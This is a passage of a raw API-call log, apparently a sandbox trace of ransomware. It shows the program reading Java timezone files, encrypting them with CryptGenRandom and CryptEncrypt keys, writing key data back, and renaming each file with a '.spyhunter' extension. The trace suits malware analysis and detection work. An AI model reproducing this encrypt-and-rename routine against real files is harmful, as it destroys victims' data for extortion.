pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique.spyhunter") returned 72 [0170.802] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\martinique"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\martinique.spyhunter")) returned 1 [0170.803] GetProcessHeap () returned 0x2c0000 [0170.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.803] GetProcessHeap () returned 0x2c0000 [0170.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.803] GetProcessHeap () returned 0x2c0000 [0170.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4740 | out: hHeap=0x2c0000) returned 1 [0170.803] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5c8 | out: pbBuffer=0x270e5c8) returned 1 [0170.803] GetProcessHeap () returned 0x2c0000 [0170.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.803] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5c0*=0x30) returned 1 [0170.804] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\manaus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.805] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus") returned 58 [0170.805] StrStrW (lpFirst="Manaus", lpSrch=".txt") returned 0x0 [0170.805] GetProcessHeap () returned 0x2c0000 [0170.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.805] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e584, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e584*=0x139, lpOverlapped=0x0) returned 1 [0170.806] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffec7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.806] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x139, lpNumberOfBytesWritten=0x270e584, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e584*=0x139, lpOverlapped=0x0) returned 1 [0170.807] GetProcessHeap () returned 0x2c0000 [0170.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.807] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.807] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e584, lpOverlapped=0x0 | out: lpBuffer=0x270e5c4*, lpNumberOfBytesWritten=0x270e584*=0x4, lpOverlapped=0x0) returned 1 [0170.807] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e584, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e584*=0x30, lpOverlapped=0x0) returned 1 [0170.807] CloseHandle (hObject=0xb0) returned 1 [0170.807] GetProcessHeap () returned 0x2c0000 [0170.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.807] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus.spyhunter") returned 68 [0170.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\manaus"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\manaus.spyhunter")) returned 1 [0170.808] GetProcessHeap () returned 0x2c0000 [0170.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.808] GetProcessHeap () returned 0x2c0000 [0170.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.808] GetProcessHeap () returned 0x2c0000 [0170.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8f80 | out: hHeap=0x2c0000) returned 1 [0170.809] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5c8 | out: pbBuffer=0x270e5c8) returned 1 [0170.809] GetProcessHeap () returned 0x2c0000 [0170.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.809] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5c0*=0x30) returned 1 [0170.809] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\managua"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.810] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua") returned 59 [0170.811] StrStrW (lpFirst="Managua", lpSrch=".txt") returned 0x0 [0170.811] GetProcessHeap () returned 0x2c0000 [0170.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.811] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e584, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e584*=0xb9, lpOverlapped=0x0) returned 1 [0170.812] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.812] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x270e584, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e584*=0xb9, lpOverlapped=0x0) returned 1 [0170.812] GetProcessHeap () returned 0x2c0000 [0170.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.812] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.812] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e584, lpOverlapped=0x0 | out: lpBuffer=0x270e5c4*, lpNumberOfBytesWritten=0x270e584*=0x4, lpOverlapped=0x0) returned 1 [0170.812] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e584, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e584*=0x30, lpOverlapped=0x0) returned 1 [0170.812] CloseHandle (hObject=0xb0) returned 1 [0170.813] GetProcessHeap () returned 0x2c0000 [0170.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.813] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua.spyhunter") returned 69 [0170.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\managua"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\managua.spyhunter")) returned 1 [0170.814] GetProcessHeap () returned 0x2c0000 [0170.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.814] GetProcessHeap () returned 0x2c0000 [0170.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.814] GetProcessHeap () returned 0x2c0000 [0170.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8ec0 | out: hHeap=0x2c0000) returned 1 [0170.814] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5c0 | out: pbBuffer=0x270e5c0) returned 1 [0170.814] GetProcessHeap () returned 0x2c0000 [0170.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.814] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5b8*=0x30) returned 1 [0170.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\maceio"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.816] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio") returned 58 [0170.816] StrStrW (lpFirst="Maceio", lpSrch=".txt") returned 0x0 [0170.816] GetProcessHeap () returned 0x2c0000 [0170.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.816] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e57c*=0x189, lpOverlapped=0x0) returned 1 [0170.817] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.817] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x189, lpNumberOfBytesWritten=0x270e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e57c*=0x189, lpOverlapped=0x0) returned 1 [0170.817] GetProcessHeap () returned 0x2c0000 [0170.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.817] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.818] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e57c, lpOverlapped=0x0 | out: lpBuffer=0x270e5bc*, lpNumberOfBytesWritten=0x270e57c*=0x4, lpOverlapped=0x0) returned 1 [0170.818] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e57c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e57c*=0x30, lpOverlapped=0x0) returned 1 [0170.818] CloseHandle (hObject=0xb0) returned 1 [0170.818] GetProcessHeap () returned 0x2c0000 [0170.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.818] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio.spyhunter") returned 68 [0170.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\maceio"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\maceio.spyhunter")) returned 1 [0170.819] GetProcessHeap () returned 0x2c0000 [0170.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.819] GetProcessHeap () returned 0x2c0000 [0170.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.819] GetProcessHeap () returned 0x2c0000 [0170.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8e00 | out: hHeap=0x2c0000) returned 1 [0170.820] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5c0 | out: pbBuffer=0x270e5c0) returned 1 [0170.820] GetProcessHeap () returned 0x2c0000 [0170.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.820] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5b8*=0x30) returned 1 [0170.820] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\los_angeles"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.820] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles") returned 63 [0170.820] StrStrW (lpFirst="Los_Angeles", lpSrch=".txt") returned 0x0 [0170.821] GetProcessHeap () returned 0x2c0000 [0170.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.821] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e57c*=0x618, lpOverlapped=0x0) returned 1 [0170.838] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff9e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.838] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x270e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e57c*=0x618, lpOverlapped=0x0) returned 1 [0170.838] GetProcessHeap () returned 0x2c0000 [0170.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.838] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.838] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e57c, lpOverlapped=0x0 | out: lpBuffer=0x270e5bc*, lpNumberOfBytesWritten=0x270e57c*=0x4, lpOverlapped=0x0) returned 1 [0170.839] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e57c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e57c*=0x30, lpOverlapped=0x0) returned 1 [0170.839] CloseHandle (hObject=0xb0) returned 1 [0170.839] GetProcessHeap () returned 0x2c0000 [0170.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0170.839] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles.spyhunter") returned 73 [0170.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\los_angeles"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Los_Angeles.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\los_angeles.spyhunter")) returned 1 [0170.840] GetProcessHeap () returned 0x2c0000 [0170.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0170.840] GetProcessHeap () returned 0x2c0000 [0170.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.840] GetProcessHeap () returned 0x2c0000 [0170.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4678 | out: hHeap=0x2c0000) returned 1 [0170.840] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5b8 | out: pbBuffer=0x270e5b8) returned 1 [0170.840] GetProcessHeap () returned 0x2c0000 [0170.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5b0*=0x30) returned 1 [0170.840] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\louisville"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.857] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville") returned 71 [0170.858] StrStrW (lpFirst="Louisville", lpSrch=".txt") returned 0x0 [0170.858] GetProcessHeap () returned 0x2c0000 [0170.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0170.858] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e574*=0x5dc, lpOverlapped=0x0) returned 1 [0170.907] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.907] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5dc, lpNumberOfBytesWritten=0x270e574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e574*=0x5dc, lpOverlapped=0x0) returned 1 [0170.907] GetProcessHeap () returned 0x2c0000 [0170.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0170.907] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.907] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e574, lpOverlapped=0x0 | out: lpBuffer=0x270e5b4*, lpNumberOfBytesWritten=0x270e574*=0x4, lpOverlapped=0x0) returned 1 [0170.907] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e574, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e574*=0x30, lpOverlapped=0x0) returned 1 [0170.908] CloseHandle (hObject=0xb0) returned 1 [0170.908] GetProcessHeap () returned 0x2c0000 [0170.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.908] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville.spyhunter") returned 81 [0170.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\louisville"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\Louisville.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\louisville.spyhunter")) returned 1 [0170.909] GetProcessHeap () returned 0x2c0000 [0170.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.909] GetProcessHeap () returned 0x2c0000 [0170.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.909] GetProcessHeap () returned 0x2c0000 [0170.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d6f8 | out: hHeap=0x2c0000) returned 1 [0170.909] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5b8 | out: pbBuffer=0x270e5b8) returned 1 [0170.909] GetProcessHeap () returned 0x2c0000 [0170.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5b0*=0x30) returned 1 [0170.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vincennes"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.910] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes") returned 69 [0170.910] StrStrW (lpFirst="Vincennes", lpSrch=".txt") returned 0x0 [0170.910] GetProcessHeap () returned 0x2c0000 [0170.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0170.911] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e574*=0x374, lpOverlapped=0x0) returned 1 [0170.994] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffc8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.994] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x270e574, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e574*=0x374, lpOverlapped=0x0) returned 1 [0170.995] GetProcessHeap () returned 0x2c0000 [0170.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0170.995] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.995] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e574, lpOverlapped=0x0 | out: lpBuffer=0x270e5b4*, lpNumberOfBytesWritten=0x270e574*=0x4, lpOverlapped=0x0) returned 1 [0170.995] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e574, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e574*=0x30, lpOverlapped=0x0) returned 1 [0170.995] CloseHandle (hObject=0xb0) returned 1 [0170.995] GetProcessHeap () returned 0x2c0000 [0170.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.995] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes.spyhunter") returned 79 [0170.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vincennes"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vincennes.spyhunter")) returned 1 [0170.996] GetProcessHeap () returned 0x2c0000 [0170.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.996] GetProcessHeap () returned 0x2c0000 [0170.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.996] GetProcessHeap () returned 0x2c0000 [0170.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d620 | out: hHeap=0x2c0000) returned 1 [0170.996] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5b0 | out: pbBuffer=0x270e5b0) returned 1 [0170.996] GetProcessHeap () returned 0x2c0000 [0170.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.997] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5a8*=0x30) returned 1 [0170.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Marengo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\marengo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 